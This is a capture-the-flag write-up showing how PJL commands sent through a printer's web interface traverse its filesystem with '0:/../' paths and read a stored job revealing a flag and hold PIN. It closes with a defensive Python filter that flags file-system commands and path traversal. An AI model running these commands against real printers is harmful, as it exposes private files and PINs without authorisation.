Wander
My uncle isn’t allowing me to print documents. He’s off to vacation and I need a PIN to unlock this printer. All I found is a web server where this printer is managed from. Can you help me with this situation?
Steps
- Start by navigating to the webpage by pasting the IP:port into the browser
- The only tab that brought up a new page was `Job Controls`, which brought up the path `/jobs`
- Submitting text brought up the path `/printer`
- This is evident when inspecting the HTML code
```html
<form action="printer" method="post">
  <input type="text" placeholder="@PJL INFO ID" name="pjl">
  <input type="submit" value="Send">
</form>
```
- Submitting `@PJL INFO ID` returns `HTB Printer`
- PJL stands for HP Printer Job Language, so I looked for more PJL commands from HP which brought me to this document
- I also found a reference for hacking printers here, but that was not needed for this challenge
- The main command I used was `FSDIRLIST` to view and traverse the filesystem
```
# view current directory
@PJL FSDIRLIST NAME="0:" ENTRY=1
# view parent directory
@PJL FSDIRLIST NAME="0:/../" ENTRY=1
```
- Once in the parent directory, I saw a home folder listed
```
# navigating to home folder
@PJL FSDIRLIST NAME="0:/../home/" ENTRY=1
```
- The `home` folder contained a folder called `default`, which contained a file `readysize`
- To see file contents, we use `FSUPLOAD`
```
# command
@PJL FSUPLOAD NAME="0:/../home/default/readyjob"
# contents
@PJL FSUPLOAD FORMAT:BINARY NAME="0:/../home/default/readyjob" OFFSET=0 SIZE=457
%-12345X@PJL
@PJL COMMENT FLAG = "HTB{w4lk_4nd_XXXXXX}"
@PJL JOB NAME = "JetDirectBoot Job"
@PJL SET USERNAME="default"
@PJL SET HOLDKEY="8214"
@PJL SET ORIENTATION = PORTAIT
@PJL SET QTY = 1
@PJL SET DUPLEX = ON
@PJL SET RESOLUTION = 600
@PJL SET OUTBIN = LOWER
@PJL COMMENT START PCL JOB
@PJL ENTER LANGUAGE = PCL
%-12345X@PJL
@PJL EOJ
%-12345X
```
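The directory listing and file read above work because the `NAME` argument accepts `0:/../`, which climbs out of volume `0:`. The following is an added example, not part of the original write-up or the challenge's code: a filter that a web front end like this one could apply to the submitted `pjl` field before forwarding it to the printer. The allowlist (`INFO`, `ECHO`) and the function names are assumptions chosen for illustration.

```python
import re

# PJL file-system commands from HP's PJL reference; the write-up uses the first two.
FS_COMMANDS = {"FSDIRLIST", "FSUPLOAD", "FSDOWNLOAD", "FSQUERY",
               "FSDELETE", "FSMKDIR", "FSAPPEND", "FSINIT"}
# Assumed policy: only read-only status commands may pass from the web form.
ALLOWED_COMMANDS = {"INFO", "ECHO"}

PJL_LINE = re.compile(r'^\s*@PJL\s+(?P<cmd>[A-Za-z]+)(?P<args>.*)$')
NAME_ARG = re.compile(r'NAME\s*=\s*"(?P<vol>\d+):(?P<path>[^"]*)"', re.I)


def escapes_volume(path: str) -> bool:
    """True if the path climbs above the volume root, e.g. '/../home/'."""
    depth = 0
    for part in path.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def inspect_pjl(line: str) -> list[str]:
    """Return findings for one submitted PJL line; an empty list means allow."""
    m = PJL_LINE.match(line)
    if not m:
        return ["not-pjl"]
    cmd = m.group("cmd").upper()
    findings = []
    if cmd in FS_COMMANDS:
        findings.append("filesystem-command")
    elif cmd not in ALLOWED_COMMANDS:
        findings.append("command-not-allowlisted")
    name = NAME_ARG.search(m.group("args"))
    if name and escapes_volume(name.group("path")):
        findings.append("path-traversal")
    return findings


if __name__ == "__main__":
    # Inputs taken from the steps above.
    for sample in ['@PJL INFO ID',
                   '@PJL FSDIRLIST NAME="0:" ENTRY=1',
                   '@PJL FSUPLOAD NAME="0:/../home/default/readyjob"']:
        print(sample, "->", inspect_pjl(sample) or "allow")
```

The same findings can be logged rather than blocked, which turns the filter into a detection for file-system PJL arriving through the management page.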